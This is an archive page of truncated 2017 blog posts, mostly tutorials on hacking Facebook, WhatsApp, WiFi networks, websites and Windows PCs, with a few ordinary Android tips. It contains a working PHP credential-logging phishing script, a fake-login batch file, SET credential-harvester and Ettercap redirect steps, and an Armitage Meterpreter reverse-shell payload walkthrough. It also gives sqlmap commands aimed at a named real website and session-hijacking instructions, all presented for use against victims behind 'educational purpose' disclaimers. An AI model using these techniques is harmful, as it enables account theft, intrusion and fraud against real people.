Posts

Showing posts from 2017

Hacking Facebook using FaceNiff

How to hack facebook in android? The Given Steps Below :- Only For EDUCATION PURPOSE 1) At FirstDownload Faceniff App 2) Connect to the working network connection and open the FaceNiff app. 3)Now click the red button and it willthen turn green when the sniffer is on.It is like Firesheep for android devices.(Firesheep is a Firefox add-on that allowed unscrupulous users to do the same thing. FaceNiff has a leg up on Firesheep though, since the app runs on Android phones, doesn’t req uire any real customization to run, and even supports WPA encrypted wireless networks, as long as you’re already on the network.Press the enter button and It would show a list of all the accounts which are connected to the network and you could hi jack into that all accounts. 4) Click on the account which you wish to hack and you will automatically logged in the account in which you wish you to.  5) Now you can do whatever you want with the hacked account.   I am n...

Online Account Hacking

Online account hacking: Accounts can be hacked using online hacking tools that uses some information about the account and using that it can crack up the accounts.Online tools are pre programed to do so and can be the easiest way to hack passwords if you are familier with some of the information of account.Following are some of the best online hacking tools that you can use: a)Brutus: Many consider it to be the fastest online password hacking tool and is also free and available for both Linux and Windows.It supports password cracking in HTTP,POP3,FTP,SMB,Telnet and other types such as IMAP,NNTP,Netbus,etc.Brutus is open source tool and is best for doing online hacking of many types of accounts. b) THC-Hydra: Probably the most widely used online hacking tool that is capable of hacking web form authentication and when it is used with other tools like Tamper Data,it can become a powerful and effective tool for cracking nearly every type of online password authentica...

Hacking Facebook in Windows

Hacking Facebook account using Notepad and cmd in Windows Today  khmerstarit will show you how to hack facebook account using CMD. Now follow my steps: 1. Open notepad and copy these codes @echo off color a title Login echo Please Enter Email Address And Password echo. echo. cd "C:\Logs" set /p user=Username: set /p pass=Password: echo Username="%user%" Password="%Pass%">Logs.txt start www.facebook.com exit 2.Save it as khmerstarit.bat 3.Click on your c drive and create a folder named logs. 4. Now create a shortcut file of that bat. 5. then right click on the shortcut one and click on properties. And change the icon Download a facebook icon from google.

Facebook Hacking using SET and Armitage

Hacking Facebook Account With SET And Ettercap Hello Everyone, here’s another simple tutorial for hacking facebook account using SET and Ettercap In this method whenever victim opens facebook.com the victim will automatically redirected to our fake facebook page.So it sounds little Good so why late lets start the attack Requirements: Attacker’s machine: KALI LINUX victim’s machine: Any os(win 7, 8, 8.1,10) STEPS: 1.Boot kali linux , open terminal and type setoolkit and press enter. 2. Now select 1 and hit enter 3. Now select 2 and press enter. 4. Now select credential harvester attack , i.e option-3 and press enter. 5. select option 2 again and hit enter. 6.Now we have to enter our ip address for post back method. 7. open new terminal and type ifconfig and copy your ip address. 8. Now paste that ip address in previous terminal and press enter. 9. Enter the url of facebook as https://www.faceboo k.com 10.Now login page of facebook will be cloned with...

Password Breaking Tools

How To Hack Accounts Passwords -Password Breaking Tools  1.Password hashes: Passwords that you type in your computer operating systems are stored somewhere on the disc in the form of hashes.These hashes are not in clear text therefore to access these hashes root/sysadmin privilages are required.In windows operating system these hashes are stored on the local disc in the SAM file,while in linux stores these hashes in /etc/shadow file.Hence to encrypt out the password out of these hashes the root access is required and therefore the password can only be cracked by this process only if the operating system can be in your control for some time or you can use the system by your own. a)Dictionary: Using dictionary attack to find the password out of hashes is the simplest and fastest method.It just runs through dictionary of words and tries each one of them to check whether it works or not.It could seem to be impossible if it has to be done manually as one cannot try ...

Hacking Windows Pc with Armitage

Hack windows pc with Armitage in Kalilinux  Hello readers,here is a another kali linux tutorial for you to hack a windows pc graphically using Armitage. Armitage is a preinstalled tool in kalilinux so lets begin attack Requirements : Kali linux (live machine or host machine) Victim (Windows pc 10/8.1/8/7/xp) Step1: Open kali linux and click on Armitage and connect it . Step2 :Now it will open Armitage interface and it also shows available victim PC in your network. armitage kali liux 3.Now select the target machine. Here we selecting Windows pc . 4.From the left panel selectPayload>Windows>Meterpreter>reverse_tcp and change port address as your wish here I am giving (port6565)and set output asEXE and launch it armitage kali linux Step5 : It will generate .exe payload to you so you have to save that .exe payload in your pc. Step6 :Now again open from the left panel selectPayload>Windows>Meterpreter>reverse_tcp and change port address to previou...

Best Bootable USB Creation

Best Bootable USB Creation Creating and using bootable USB devices for installing new operating system have many advantages over installing from bootable DVD. The USB driveis *.Easy to create, erase and reuse. *.Can install multiple OS on same USB at a time. *.Faster booting and installation speed. *.Portable and easy to handle. *.Using the bootable USB for testing Live Linux OS, you can install temporary software

Tools Required to Load Windows 7 Installation

Tools Required to Load Windows 7 Installation Files: 1.USB flash drive with a minimum capacity of 4 GB. 2.Windows or Linux ISO files 3.BOOTABLE Softwares-> There are so many Bootable softwares Here we are usingUniversal Usb Installer can download from here. Open yourUniversal Usb Installer Step 1: Select your Os to install From drop down. Step2:Browse your iso file from your Pc. Step3: Select Usb drive . Step 4: Click on Create. Now its creating your Usb drive bootable It takes time based on your ISO file size. After Installation Complete safely remove the pendrive from PC.

Recover Deleted Files on Android

How to recover deleted files,photos,messages on Android If you’ve accidentally deleted all your important data including images, whatsapp messages,videos SMS messages – or even just a single, important message – you need to act fast. Lost data recoverable, but only until the portion of memory on which they were saved is over-written by an app update, file download or similar. so today i’m gonna show you how to recover deleted files, media and messages on android Tools to rec over deleted files There are several different PC and Mac-based tools available. They essentially all do the same thing: scan your Android’s memory, then identify and recover your deleted media of any android phone. Note that many, if not all, of these processes require root access to your phone, which can void the warranty. FonePaw Android Data Recovery Wondershare Dr. Fone for Android (I prefer) Coolmuster Android SMS Contacts Recovery Wondershare has a free trial that lets you recover d...

Make Android Faster

Make android faster changing few developer settings Here Is a simple tweak that will increase you android device speed ,switching Closing and opening new apps will show you a significant speed difference Steps:- Goto settings > developer options You will see three options Window animation scale Transition animation scale Animator scale The default setting is 1x You need to change them to 0.5x And done You should now notice a faster transition while jumping between apps ,and it won’t be drain on the battery either. It’s a bit of a cheat, but a noticeable difference.

Caller id spoof and Free Call

Trick for caller id spoof and free call or sms to any number without showing your number Make call without showing your real No.Caller Id spoofing Hello friends, Hope you all are going well.After a long time I’m back with a trick by which you can call or message to any number in any country free of cost…its Free Free Free….and the intresting thing is that the receiver can’t able to see your number…you can send sms and make call without showing your real Number.. Caller Id spoofi ng So here is the trick you have to follow.it’s so easy. First of all you have to download a software named “VOXOX” You can download it from the below links. > For android – DOWNLOAD ( http://www.4sha red.com/mobile /SmZ1- j7kce/voxoxo.ht ml) After downloading the software install it and then signup using email…and give your number to receive the OTP. After succesfull login go to settings and remove the number you used for the registration..thats all Now you can make call to anyone witho...

Use android as a Webcam

How to use Android as a Webcam There can be many reasons to use Android as a webcam. It could be because you are on a desktop and your desktop doesn’t have a webcam, or the quality of your webcam is very bad. You could use the front or back camera of your android device to use as a webcam. You just need to follow a few steps to replace your laptop’s webcam with a HD camera of your android mobile. Use this camera whenever you need to video call with someone with one click. Req uirements:- *.Android Mobile *. IP Webcam for android *. IP Webcam application for PC *.Google or Firefox Browser Steps to Follow:- Step 1: Download and install IP webcam for Android and PC. Step 2: Open the App on your android device and change the settings of the device according to your requirements. You could change the video quality, which camera to use, rear and main, username, password, etc. Step 3: After changing the settings, click on Start Server. Step 4: An IP address would star...

Hacking WiFi in Android 2

How to hack WiFi in android? Proceed only if your device falls under either of the below category. Otherwise it is waste of time and energy. For better results useCyanogen ROM. 1.Android Device should be rooted.  2.Android Device should support bcmon App(i.e should haveBroadcom bcm4329/4330wifi chipset.                                                     [OR] 3.[Update] Now 'nonbcmonsupported devices' & 'devices which support external WiFi cards' can also be used to hack WiFi. Check this post How To Hack Wifi Using Android Withou t bcmonTools Used:*.bcmon app[apk] -This tool enablesMonitor Modeon your rooted device with Broadcom chipset, which is essential for hacking WiFi using android.Download*.Reaverfor Android orRfA - A WiFi pentesting tool which can be used to attack WPS-enabled routers and after the WPS-Pin is cracked, it c...

Hacking WiFi in Android

Hacking WEP type WiFi Using Android Phone. WEP is an outdated,extremely weak protocol to secure WiFi and it is no more preferred because it can be hacked within seconds. However due to lack of awareness it is still used across the world. Below instructions explain how you can use you android device to hack a WEP protected WiFi network. Procedure *.bcmon app is used here also. So download and install it as told above*.Tap "Run bcmon terminal". This will launch a terminal simila r to most Linux terminals.*.Type airodump-ngand tap the Enter button. In the newly opened window type airodump-ng wlan0and tap the Enter button.*. Open reaver and note down the WiFi (Access point) name,Mac Address and the broadcasting channel of the WiFi which you want to hack. Make sure it is WEP.*.Now we can start scanning the target WiFi and collect packets. Type the following *.airodump-ng -c channel# --bssid MAC address -w output file ath0*. Note:channel# = broadcasting channel...

Hacking WiFi

Image
Hack a WiFi Network In 8 Easy Steps. ( Using Windows)12 Hack a WiFi Network In 8 Easy Steps,WIFI HACKINGIt takes about 5-6 hours if the passwordis weak a high signal of the WiFi network you are going to hack and you have sometimes 10-12 for more complicated passwords and if the WiFi signal of the Network is weak .The time taken also changes if the WiFi network you are going to hack has many other clients already accessing it . those who know how to hack using backtrack please don't laugh its for beginner Tools needed :Packet sniffer:* Commview for WiFi ( check it website and see if ur wifi card is supported https://www.tamos.com/products/commwifi/adapterlist.php ){ get the 30 day trial or use the free full version available on net from other sites.) (i recomment the 30 day trial because it will be the latest ) after it expires y can always go to other means.You will use this tool for capturing the packets sent and recieved through the Access Point you are going to...

Hacking WiFi in Linux

How to hack WiFi in linux? Step One:Start Kali Linux and login, preferably as root. Step Two:Plugin your injection-capable wireless adapter, (Unless your native computer wireless card supports it). If you’re using Kali in VMware, then you might have to connect the card via theicon in the device menu. Step Three:Disconnect from all wireless networks, open a Terminal, and typeairmon-ngThis will list all of the wireless cards that support monitor (not injection) mode. If nocards are listed, try disconnecting and reconnecting the adapter (if you’re using one) and check that it supports monitor mode. If you’re not using an external adapter, and you still don’t see anything listed, then your card doesn’t support monitor mode, and you’ll have to purchasean external one (see the link in therequirements). You can see here that my card supports monitor mode and that it’s listed aswlan0. Step Four:Typeairmon-ng startfollowed by the interface name of your wireless card. ...

Hacking Facebook in Android

How to hack facebook in android? The Given Steps Below :-Only ForEDUCATION PURPOSE 1) At FirstDownload Faceniff App 2) Connect to the working network connection and open the FaceNiff app. 3) Now click the red button and it willthen turn green when the sniffer is on.It is like Firesheep for android devices.(Firesheep is a Firefox add-on that allowed unscrupulous users to do the same thing. FaceNiff has a leg up on Firesheep though, since the app runs on Android phones, doesn’t req uire any real customization to run, and even supports WPA encrypted wireless networks, as long as you’re already on the network.Press the enter button and It would show a list of all the accounts which are connected to the network and you could hi jack into that all accounts.This is official Method Written By Mukeshtricks4u.com   )4) Click on the account which you wish to hack and you will automatically logged in the account in which you wish you to. 5) Now you can do whatever you ...

Hacking Facebook account using Phishing

H ow to hack facebook account in windows using phishing? This is one of the common method to hack facebook account. STEP 1:Creating Phishing.php file :1. Even if you don’t have any knowledge of php file simply copy the following script and saveit as phishing.php .:<?phpheader(“Location: https://www.facebook.com/login.php ”);$handle = fopen(“passwords.txt”, “a”);foreach($_GET as$variable => $value) {fwrite($handle,$variable);fwrite($handle, “=”);fwrite($handle, $value);fwrite($h andle, “rn”);}fwrite($handle, “rn”);fclose($handle);exit;?> STEP 2: Creating index.html page : 1. Open the Facebook login page then, Right click>View page source and paste it in notepad and save it aindex.html 2. Open thatindex.htmlfile with a Notepad and search (By pressing Ctrl F) for : action in it and replace the highlighted part (as in the following screenshot) with phishing.php . 3. search (By pressing Ctrl F) for : method in it and replace the highlighted part (post) with...

Hacking Facbook usin SET (Social Enggineering Toolkit)

How to hack facebook account using kali linux 2.0 1. Download and setup Kali Linux 2. Fire up terminal and type sudo for getting root permission 3. Enter your root username and password 4. Now open social engineering toolkit by typing setoolkit in terminal 5. Enter"1"to doSocial-Engineering Attacks 6. Then Enter"2"to selectWebsite Attack Vectors 7. Enter"3"to selectcredential harvester attackmethod 8. Enter"2"as we want to hack facebook with a clone webpage|phishing attack 9.Open a new terminal and typeifconfig 10.Then copy-paste the IP 11.Now enterurlof site you want to clone ( https://www.facebook.com ) 12. Nowshorten your IP address usingadf.lyorgoo.glWhy we are shortening the like because links will look less spammy 13. Now it's time to send shortened link tothe victim 14. As and when victim enter there credential the info appear in the terminal.  I am not responsible for any crime, do it on yo...

Hacking Android Game using Lucky Patcher

How to hack android games using lucky patcher? Now you can use several ways. Method 1:-(Apply Method 3 described below to increase your chance of success) 1)Open Lucky patcher apk and grant root access. 2)Now minimize or close Lucky patcher and open the app in which you want to hack in app purchases. 3)Go to purchase section and click on buy or anything that is written in your app. 4)Now the lucky patcher's window opens itself instead of google in app purchase box. In that window you will see "Do you want to try to get this app for free" as shown in screen shots below and Select "yes". Non-rooted user Click on "send replyto application(Unsigned). 5)Done. Now you hacked the In app purchase successfully. If the app is supported, then the thing you are trying to download starts downloading or the feature you want Unlock will be unlocked. Since this feature is automatically enabled when you install lucky patcher, you can disable it if y...

Learn How to Hack Website using SQL Injection

Learn How To Hack Websites With Different Techniques..  (EDUCATIONAL PURPOSE ONLY) SQL Injection in MySQL Databases:-                 SQL Injection attacks are code injections that exploit the database layer of the application.This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database. Step 1: When testing a website for SQL Injection vulnerabilities, you needto find a page that looks like this: www.site.com/page=1orwww.site.com/id=5Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ‘ after the number in the url. For example: www.site.com/page=1 ′If the database is vulnerable, the page will spit out a MyS...

Hacking Whatsapp Account

Hack WhatsApp Account On Daily we have heard news about online services is sufferingfrom a lack of security. In February WhatsApp has been down for nearly four hours, as if this were not enough, people became aware of the security flaw that allows conversations that should be read by anyone provided it learn properly performthe procedures. Steps to follow: 1 – First of all you need to have the device at hand, use the SocialEngineering and be quick in getting the e-mail and backu p filesmsgstore-2014-05-02.1.db.crypt5.To get the email for this follow the procedures below.Enter the Play Store and view the e-mail, or write down mentalize somewhere without the person noticing.Now Go to the device settings fromSettings -> Accounts & Sync, look for the email from Google and mentalize or write down somewhere without the person noticing. 2 – Now let’s take the msgstore-2014-05-08.1.db.crypt7 file To do this, usePolaris Officeor any other app that allows you to nav...

Hacking Website using METASPLOIT

How to hack website using metasploit? METASPLOIT ANTI FORENSICS:Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer little difficult. They are released as a part ofMAFIA(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.Metasploit comes in the followingversions: 1. CLI (Command Line Interface) 2. Web Interface 3. MSF Console 4. MSFwx 5. MSFAPII would recommend using the MSF Console because of its effectiveness & powerful from a pentester’s P0V. Another advantage of this mode is, several sessions of msfconsole could be run simultaneously.I would recommend you doing the following things in Metasploit, on a Backtrack(system or image), avoiding the windows version of the tool.For those of all who don't know, Backtrackis a linux distro especially for security personals, including all the tools required by a pentes...

Hacking Computer with an Image

How to hack computer with just an image? Yes, the normal looking images could hack your computers — thanks to a technique discovered by security researcher Saumil Shah from India.Dubbed “Stegosploit,” the technique lets hackers hide malicious code inside the pixels of an image, hiding a malware exploit in plain sight to infect target victims.Just look at the image and you are HACKED!Shah demonstrated the technique during a talk titled, “Stegosploit: Hacking With Pictures,” he gave on Thursday at the Amsterdam hacking conference Hack In The Box.According to Shah, “a good exploit is one that is delivered instyle.”Keeping this in mind, Shah discovered a way to hide malicious code directly into an image, rather than hiding it in email attachments, PDFs or other types of files that are typically used to deliver and spread malicious exploits.To do so, Shah used Steganography — a technique of hiding messages and contents within a digital graphicimage, making the messages impo...

Hacking Website by HTML Coding

How to Hack a Website with Basic HTML Coding If you have basicHTMLand JavaScript knowledge, you may be able to access password protected websites. This article will give you an easy method to hack simple, less-secured websites of your choice simply through HTML. Use it responsibly. Note: This basic method works only for websites with extremelylow security barriers. Websites with robust security details will not be susceptible to this kind of simple attack. Steps: 1Open the site y ou want to hack.Provide wrong username and wrong password combination in its log in form. (e.g. : Username : me and Password: ' or 1=1 --) An error will occur saying wrong username and wrong password. Now be prepared because your experiment starts from here. 2Right click anywhere on that error page =>> go to view source. 3View the source code.There you can see the HTML coding with JavaScript.*.There you find something like this....<_form action="...Login...."...

Hacking Facebook By Phishing Method

How to hack facebook with Phising:- Steps To Hack Facebook Account Through Link:- #1. Firstly Open a site name Z-SHADOW. #2. After opening click on Sign Up Here.@Sign Upis also too easy, Fill the signup form. #3.Yeah ! You created your account easily i know. now go ahead and go to Login PanelSection at left top corner, enter your registered username and password and click on Login & go inside the Z-Shadow. #4. Here you find a new page and here are many types of apps for facebook hacking.choose any type of link that you want to send your victim e.g if you want him/her to give followers then copy the link of that particular app.keep in mind these are in manylanguageso choose according to your needs. #5. Now send that copied link to your victim and as the victim open it and enter his/her passwordand Login in it. As victim enter his/her information EMAIL and PASSWORD then its facebook account is Hacked.   I am not responsible for any crime, do it on yo...

Hacking Website in Linux

Hacking website in linux. Step 1: Fire Up Kali Linux I guess you know how to do this step:D Step 2: Start a New TerminalStart by opening a new terminal. We'll use this terminal later. Step 3: Find a Vulnerable WebsiteGo to Google and search for: php?id=1. If you found a site that got that in their link put an ' after the 1. If it says that there's a problem with the sql syntax then the site is vulnerable. Step 4: Using Sqlmap to Hack ItIn your terminal type:sqlmap -uhttp://www.angelvestgroup.com/info.php?id=1--dbs( http://www.angelvestgroup.com/info.php?id=1 is my vulnerable url)Now it's going to load the databases...If that's done you'll need to select a database by typing:sqlmap -uhttp://www.angelvestgroup.com/info.php?id=1-D angelvest_china --tables(angelvest_china is the database I found)Now it's going to load all the information that's in the database you've selected.Now you'll need to select a table by typing:sqlmap -uh...

How to Hack Into a Computer Without an Account

How to Hack Into a Computer Without an Account If you have reason to access a computer without an account, you'll need to navigate to the "Safe Mode with Command Prompt" and change the password. You should then be able to restart the computer and enter the new password for the account you hacked. This method only works for Windows operating systems. StepsEdit 1.1 Turn on the Computer. 2.2 Before it shows the Windows Logo, start repeatedly pressing the F8 key. 3.3 Use the up/down keys to navigate your way to "Safe Mode with Command Prompt" and press enter. (After this the screen will appear dark and will show a bunch of computer codes. Don't be afraid, this will only go on for a little while. Just make sure no one else comes in when the screen is like that). Then it will go to the account/login screen 4.4 Notice there will be a new account called "Administrator". 5.5 Click on it and then you"ll go to "Safe mode...

HACKING ASP / ASPX SITES (MANUALLY)

HACKING ASP / ASPX SITES -- (MANUALLY) -- Cyber Security Expert & Penetration Tester chetansoni@live.comASPX Injection is also similar to PHP based SQL Injection. But here, we don’t use queries that contain order by, union select etc. Instead, we will cheat the server to respond with the information we needed. It is an error based injection technique. We will get the information in the form of errors.Find Out A Vulnerable Link First, we need find out a vulnerable asp/aspx link which looks like http://www.vulnerablesite.com/index.aspx?id=10CHECKING FOR VULNERABILITY As in the PHP based injection, we will test for the vulnerability by adding a single quote at the end of the URL. http://www.vulnerablesite.com/gallery.aspx?id=10′ If it gives an error similar to the following, then our site is vulnerable to sql injection.To check the error just type apostrophe at the end of the vulnerable URL http://website.org/search.aspx?txt=EDIT’To check that whether the s...

Hacking / Exploiting / cheating in Online Games

Hacking / Exploiting / cheating in Online Games . . . . Next Generation hacking Exploit-development Reversing Web-AuditWhat is this talk about ? I. This talk is about hacking / exploiting cheating in online games II. real world Cheating is mainly focused in this talk, because it’s fun and legal, During this talk we will have a tour into all of ways to manipulating an online game and we will end up with bypassing latest anti-cheating technologies and manipulating the game to our heart's desire. III. After this talk you can go and play a bit and test your learned lesson.Agenda Part Part Part Part Part Part I II III IV V VI : : : : : : introduction Hacking Online Game Servers Exploiting Online Games Cheating in Online games Creating your own cheats Bypassing anti-cheat enginesPart I : IntroductionWhy Exploit/Hack Online Games? . Why not ? . Millions of players around . Cheating make you a p0rnstar in games . Impress your friends . Get...